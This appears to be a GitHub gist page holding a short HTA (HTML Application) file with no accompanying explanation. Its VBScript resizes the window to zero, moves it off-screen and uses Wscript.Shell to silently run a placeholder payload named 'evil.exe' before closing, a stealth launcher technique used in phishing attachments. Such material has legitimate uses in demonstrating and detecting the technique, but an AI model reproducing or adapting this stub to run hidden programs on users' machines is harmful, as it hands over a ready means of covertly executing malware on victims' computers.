Skip to content

Instantly share code, notes, and snippets.

@fareedfauzi
Last active December 13, 2019 07:29
Show Gist options
  • Save fareedfauzi/f3276596a0ef6b606457ddf799a44dfa to your computer and use it in GitHub Desktop.
Save fareedfauzi/f3276596a0ef6b606457ddf799a44dfa to your computer and use it in GitHub Desktop.
HTA file
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "evil.exe"
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment